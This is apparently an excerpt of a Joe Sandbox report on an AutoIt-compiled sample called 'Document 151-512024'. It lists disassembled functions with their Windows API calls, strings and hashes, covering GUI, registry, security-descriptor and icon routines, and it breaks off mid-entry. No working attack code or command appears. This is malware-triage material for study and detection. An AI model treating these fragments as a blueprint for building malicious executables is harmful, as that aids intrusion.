Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 7320612fa7da69b448321a35acf44b862880cbe2b1a5f64c51e1cfa33843a552
Instruction ID: 06d0174e43ecc64a3c4c59be8fb855f935cafdb7056ef558f9dca89cc6809897
Opcode Fuzzy Hash: 7320612fa7da69b448321a35acf44b862880cbe2b1a5f64c51e1cfa33843a552
Instruction Fuzzy Hash: 75E1AD316482018FC714DF28C551A2EB3E6BFC8714F548A6EF8969B3A1DB30ED45CB91

Function 00958891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00958968
GetSystemMetrics.USER32(00000007), ref: 00958970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0095899B
GetSystemMetrics.USER32(00000008), ref: 009589A3
GetSystemMetrics.USER32(00000004), ref: 009589C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009589E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009589F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00958A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00958A3C
GetClientRect.USER32(00000000,000000FF), ref: 00958A5A
GetStockObject.GDI32(00000011), ref: 00958A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00958A81

Part of subcall function 0095912D: GetCursorPos.USER32(?), ref: 00959141
Part of subcall function 0095912D: ScreenToClient.USER32(00000000,?), ref: 0095915E
Part of subcall function 0095912D: GetAsyncKeyState.USER32(00000001), ref: 00959183
Part of subcall function 0095912D: GetAsyncKeyState.USER32(00000002), ref: 0095919D

SetTimer.USER32(00000000,00000000,00000028,009590FC), ref: 00958AA8

Strings

AutoIt v3 GUI, xrefs: 00958A20

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 1aec14e53d49c7489758e308b5ce69bd01dd363fbd50c7bcdb579a8fc796082a
Instruction ID: 0e9ff73ddfed5fc0785e61f866c2c4fcf4241471a143c64b91fd437d34324f59
Opcode Fuzzy Hash: 1aec14e53d49c7489758e308b5ce69bd01dd363fbd50c7bcdb579a8fc796082a
Instruction Fuzzy Hash: 62B18C71A0420AAFDF14DFA9DC55BEE3BB5FB48315F10822AFA15A7290DB34E841CB50

Function 009A0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009A10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009A1114
Part of subcall function 009A10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A1120
Part of subcall function 009A10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A112F
Part of subcall function 009A10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A1136
Part of subcall function 009A10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009A114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009A0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009A0E29
GetLengthSid.ADVAPI32(?), ref: 009A0E40
GetAce.ADVAPI32(?,00000000,?), ref: 009A0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009A0E96
GetLengthSid.ADVAPI32(?), ref: 009A0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 009A0EB5
HeapAlloc.KERNEL32(00000000), ref: 009A0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 009A0EDD
CopySid.ADVAPI32(00000000), ref: 009A0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009A0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009A0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009A0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0F6E
HeapFree.KERNEL32(00000000), ref: 009A0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0F7E
HeapFree.KERNEL32(00000000), ref: 009A0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0F8E
HeapFree.KERNEL32(00000000), ref: 009A0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 009A0FA1
HeapFree.KERNEL32(00000000), ref: 009A0FA8

Part of subcall function 009A1193: GetProcessHeap.KERNEL32(00000008,009A0BB1,?,00000000,?,009A0BB1,?), ref: 009A11A1
Part of subcall function 009A1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,009A0BB1,?), ref: 009A11A8
Part of subcall function 009A1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009A0BB1,?), ref: 009A11B7

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 74e99c4fa54aad841e28512a73e5021788c49e06d5a10b29927081b331867640
Instruction ID: 8151a45a5040e436768ab58ff6d81985023c3967605f1755e3b5dbad5d200f7e
Opcode Fuzzy Hash: 74e99c4fa54aad841e28512a73e5021788c49e06d5a10b29927081b331867640
Instruction Fuzzy Hash: D9717CB290521AEFDF209FA4DC44FAEBBBCBF45301F144116F919B6191D730A945DBA0

Function 009CC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009CC4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,009DCC08,00000000,?,00000000,?,?), ref: 009CC544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 009CC5A4
_wcslen.LIBCMT ref: 009CC5F4
_wcslen.LIBCMT ref: 009CC66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 009CC6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 009CC7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 009CC84D
RegCloseKey.ADVAPI32(?), ref: 009CC881
RegCloseKey.ADVAPI32(00000000), ref: 009CC88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 009CC960

Strings

REG_QWORD, xrefs: 009CC8C3
REG_SZ, xrefs: 009CC644
REG_EXPAND_SZ, xrefs: 009CC5CD
REG_BINARY, xrefs: 009CC913
REG_MULTI_SZ, xrefs: 009CC6F5
REG_DWORD, xrefs: 009CC804

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: f6e3a27dbedc56c558e96e80a362d2332c5a02a696928b4ad6ac6970662ae7fa
Instruction ID: fe962da6fd6776bf9a7ee220995ea47d8cd8802878488a11e01701aa3cb2ae18
Opcode Fuzzy Hash: f6e3a27dbedc56c558e96e80a362d2332c5a02a696928b4ad6ac6970662ae7fa
Instruction Fuzzy Hash: 87124975A042119FDB14DF14C891F2ABBE5EF88714F14889DF84A9B3A2DB31ED45CB82

Function 009D091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009D09C6
_wcslen.LIBCMT ref: 009D0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009D0A54
_wcslen.LIBCMT ref: 009D0A8A
_wcslen.LIBCMT ref: 009D0B06
_wcslen.LIBCMT ref: 009D0B81

Part of subcall function 0095F9F2: _wcslen.LIBCMT ref: 0095F9FD

Part of subcall function 009A2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009A2BFA

Strings

COLLAPSE, xrefs: 009D0B01, 009D0B1C
GETTEXT, xrefs: 009D0C97
CHECK, xrefs: 009D0A85, 009D0AA0
GETSELECTED, xrefs: 009D0C4E
UNCHECK, xrefs: 009D0D3E
EXPAND, xrefs: 009D0BF8
GETTOTALCOUNT, xrefs: 009D09F2, 009D0A17
SELECT, xrefs: 009D0D11
ISCHECKED, xrefs: 009D0CE1
GETITEMCOUNT, xrefs: 009D0C1E
EXISTS, xrefs: 009D0B7C, 009D0B97

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: d332ae570a383e85e289b6bfb814c6073a1ef8a96a0cb70d107c49aee2309cea
Instruction ID: 57a2b1e8610258db42a79ccf592935f5904f199f327a7fb0cf6738b1fc2912f7
Opcode Fuzzy Hash: d332ae570a383e85e289b6bfb814c6073a1ef8a96a0cb70d107c49aee2309cea
Instruction Fuzzy Hash: 19E187356487019FCB14DF24C450A2AB7E6BFD8314F10895EF8969B3A2D735ED49CB81

Function 009CC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,009CB6AE,?,?), ref: 009CC9B5
_wcslen.LIBCMT ref: 009CC9F1
_wcslen.LIBCMT ref: 009CCA68
_wcslen.LIBCMT ref: 009CCA9E
_wcslen.LIBCMT ref: 009CCAF9
_wcslen.LIBCMT ref: 009CCB2F
_wcslen.LIBCMT ref: 009CCB7F

Strings

HKEY_CLASSES_ROOT, xrefs: 009CCAF3, 009CCAF8
HKEY_CURRENT_USER, xrefs: 009CCBBD
HKU, xrefs: 009CCBF0
HKEY_CURRENT_CONFIG, xrefs: 009CCB79, 009CCB7E
HKCR, xrefs: 009CCB29, 009CCB2E
HKEY_USERS, xrefs: 009CCBDF
HKEY_LOCAL_MACHINE, xrefs: 009CCA62, 009CCA67
HKCU, xrefs: 009CCBCE
HKCC, xrefs: 009CCBAC
HKLM, xrefs: 009CCA98, 009CCA9D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: b2b9222afbd40615096178d54f93326925729dca9948cf446c4b1eccf7a1c4cc
Instruction ID: b0a26c518009c99f4926edd8f0c6cd9b9862adb73eed6bb74acbcb62d62162e6
Opcode Fuzzy Hash: b2b9222afbd40615096178d54f93326925729dca9948cf446c4b1eccf7a1c4cc
Instruction Fuzzy Hash: 1F71F8B2E0052A8BCB10DE7CD951FBF3B999BA0790B11052CF85E97285E635DD45C3A2

Function 009D833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009D835A
_wcslen.LIBCMT ref: 009D836E
_wcslen.LIBCMT ref: 009D8391
_wcslen.LIBCMT ref: 009D83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009D83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009D5BF2), ref: 009D844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009D8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009D84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009D8501
FreeLibrary.KERNEL32(?), ref: 009D850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009D851D
DestroyIcon.USER32(?,?,?,?,?,009D5BF2), ref: 009D852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009D8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009D8555

Strings

.dll, xrefs: 009D83AB
.exe, xrefs: 009D8388
.icl, xrefs: 009D8368

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 6c1060d6bdbdfbf302342fd774c8b907e32f434a0a00857bb62fd37b81d01197
Instruction ID: 43426b3542c1dd2c8c6d9fdbf34051d6c66e431e2db2669526ba0c6e370b6ab8
Opcode Fuzzy Hash: 6c1060d6bdbdfbf302342fd774c8b907e32f434a0a00857bb62fd37b81d01197
Instruction Fuzzy Hash: 1761127198420ABEEB14CF64DC41BBF77ACFB44B10F10860AF815EA1D2DB74A980D7A0

Function 00947778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#comments-end, xrefs: 009478D9
#pragma compile, xrefs: 009477D3
#include-once, xrefs: 0094782F
Bad directive syntax error, xrefs: 0098519A
#comments-start, xrefs: 0094785F, 009478B1
Unterminated group of comments, xrefs: 0098528C
#requireadmin, xrefs: 009477FF
#ce, xrefs: 009478ED
Cannot parse #include, xrefs: 00985279
#cs, xrefs: 00947873, 009478C5
#include, xrefs: 00947847
#OnAutoItStartRegister, xrefs: 00947817
', xrefs: 00985169
", xrefs: 00985153
#notrayicon, xrefs: 009477E7

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 08968c6670606765012b531ae9e512db6b94d8f2e232fb81f86c09ad2d5d568b
Instruction ID: d5e40124536e9400182ac52a1f36ae20e54f27ee8004e3325164814c12e49b57
Opcode Fuzzy Hash: 08968c6670606765012b531ae9e512db6b94d8f2e232fb81f86c09ad2d5d568b
Instruction Fuzzy Hash: 51815B71A44209BBDB21BFA0DC43FAF77A8AF95340F018425F805AB292EB75D915C791

Function 009A5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 009A5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009A5A40
SetWindowTextW.USER32(?,?), ref: 009A5A57
GetDlgItem.USER32(?,000003EA), ref: 009A5A6C
SetWindowTextW.USER32(00000000,?), ref: 009A5A72
GetDlgItem.USER32(?,000003E9), ref: 009A5A82
SetWindowTextW.USER32(00000000,?), ref: 009A5A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009A5AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009A5AC3
GetWindowRect.USER32(?,?), ref: 009A5ACC
_wcslen.LIBCMT ref: 009A5B33
SetWindowTextW.USER32(?,?), ref: 009A5B6F
GetDesktopWindow.USER32 ref: 009A5B75
GetWindowRect.USER32(00000000), ref: 009A5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 009A5BD3
GetClientRect.USER32(?,?), ref: 009A5BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 009A5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009A5C2F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 209ccf3975526bdccdff1f5b4d5689f7fead167adec1a553729d58871e6f968c
Instruction ID: f889695cebf1f23f698a949fe64ad0fe98bbc20a0d215de28a241e804c45c1f2
Opcode Fuzzy Hash: 209ccf3975526bdccdff1f5b4d5689f7fead167adec1a553729d58871e6f968c
Instruction Fuzzy Hash: 9E718071A00B06AFDB20DFA8CE45B6EBBF9FF48705F114919E142A25A0D774E944DB60

Function 009600C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009600C6

Part of subcall function 009600ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00A1070C,00000FA0,92917CC1,?,?,?,?,009823B3,000000FF), ref: 0096011C
Part of subcall function 009600ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009823B3,000000FF), ref: 00960127
Part of subcall function 009600ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009823B3,000000FF), ref: 00960138
Part of subcall function 009600ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0096014E
Part of subcall function 009600ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0096015C
Part of subcall function 009600ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0096016A
Part of subcall function 009600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00960195
Part of subcall function 009600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009601A0

___scrt_fastfail.LIBCMT ref: 009600E7

Part of subcall function 009600A3: __onexit.LIBCMT ref: 009600A9

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00960122
kernel32.dll, xrefs: 00960133
WakeAllConditionVariable, xrefs: 00960162
InitializeConditionVariable, xrefs: 00960148
SleepConditionVariableCS, xrefs: 00960154

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: a895f01612b7ac9ed4ec7627f78510a4c13728f523024b0c2200b5ebd879a260
Instruction ID: 48c71faa0a0ea6d4c397016901b2bc271431eeed148f78c51a4bf9cd2ad439c0
Opcode Fuzzy Hash: a895f01612b7ac9ed4ec7627f78510a4c13728f523024b0c2200b5ebd879a260
Instruction Fuzzy Hash: BF21297268D7126FD7109BA4AC96F6B3398EBC6B61F014527F802E33D1DBA49840CA90

Function 009A30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009A318D
_wcslen.LIBCMT ref: 009A31F8

Strings

NAME, xrefs: 009A3335, 009A3346
TEXT, xrefs: 009A347C
CLASS, xrefs: 009A3188, 009A31A5
REGEXPCLASS, xrefs: 009A3255, 009A3266
INSTANCE, xrefs: 009A3453
CLASSNN, xrefs: 009A31F3, 009A3204

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 025ad425bc1748f6df3472d2e51fd2f63b647fb67e07e9e33b73dffcd0c0a798
Instruction ID: 55038f3c237b34449daf11face9524ee20174483f21012eb751f60a10fdf3b5b
Opcode Fuzzy Hash: 025ad425bc1748f6df3472d2e51fd2f63b647fb67e07e9e33b73dffcd0c0a798
Instruction Fuzzy Hash: F9E1D232E00516ABCB14DFB8C451BEEFBA8BF56750F54C119F456A7240EB30AE858BD0

Function 009B44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,009DCC08), ref: 009B4527
_wcslen.LIBCMT ref: 009B453B
_wcslen.LIBCMT ref: 009B4599
_wcslen.LIBCMT ref: 009B45F4
_wcslen.LIBCMT ref: 009B463F
_wcslen.LIBCMT ref: 009B46A7

Part of subcall function 0095F9F2: _wcslen.LIBCMT ref: 0095F9FD

GetDriveTypeW.KERNEL32(?,00A06BF0,00000061), ref: 009B4743

Strings

removable, xrefs: 009B45EA, 009B45EF
fixed, xrefs: 009B4635, 009B463A
network, xrefs: 009B469D, 009B46A2
ramdisk, xrefs: 009B46F1
cdrom, xrefs: 009B458F, 009B4594
all, xrefs: 009B4531, 009B4536
unknown, xrefs: 009B4708

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 297ae6070ad0bb4ef1806f74b3f50e4a31e5ed7c86922d43b588ad2dfa5d3ade
Instruction ID: e9ef08153df8add17f40b8733ab20967d47245bb57ec163f926af6cb4e2311a5
Opcode Fuzzy Hash: 297ae6070ad0bb4ef1806f74b3f50e4a31e5ed7c86922d43b588ad2dfa5d3ade
Instruction Fuzzy Hash: 1AB1F3716083029FC710DF28DA90AAAB7E9BFE6774F50491DF496C7292DB30D844DB92

Function 009D6CD9 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 009D6DEB

Part of subcall function 00946B57: _wcslen.LIBCMT ref: 00946B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009D6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009D6E81
